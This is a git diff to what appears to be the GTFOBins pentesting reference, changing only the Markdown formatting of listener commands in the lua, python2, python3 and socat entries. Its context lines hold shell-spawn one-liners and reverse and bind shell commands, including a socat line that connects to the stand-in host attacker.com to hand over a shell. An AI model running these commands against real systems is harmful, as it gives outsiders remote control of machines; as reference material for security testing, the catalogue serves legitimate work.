diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md
index 7e4d9a1..4830413 100644
--- a/_gtfobins/lua.md
+++ b/_gtfobins/lua.md
@@ -3,7 +3,7 @@ functions:
execute-interactive:
- code: lua -e 'os.execute("/bin/sh")'
reverse-shell-non-interactive:
- - description: Run nc -l -p 12345 on the attacker box to receive the shell. This requires `lua-socket` installed.
+ - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
code: |
export RHOST=attacker.com
export RPORT=12345
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index 6f7aa79..28c27e6 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -3,7 +3,7 @@ functions:
execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
+ - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index 469a231..960d00c 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@@ -3,7 +3,7 @@ functions:
execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
+ - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md
index 2e84b46..9ea1c3e 100644
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
@@ -1,13 +1,13 @@
---
functions:
reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
+ - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive:
- - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell.
+ - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane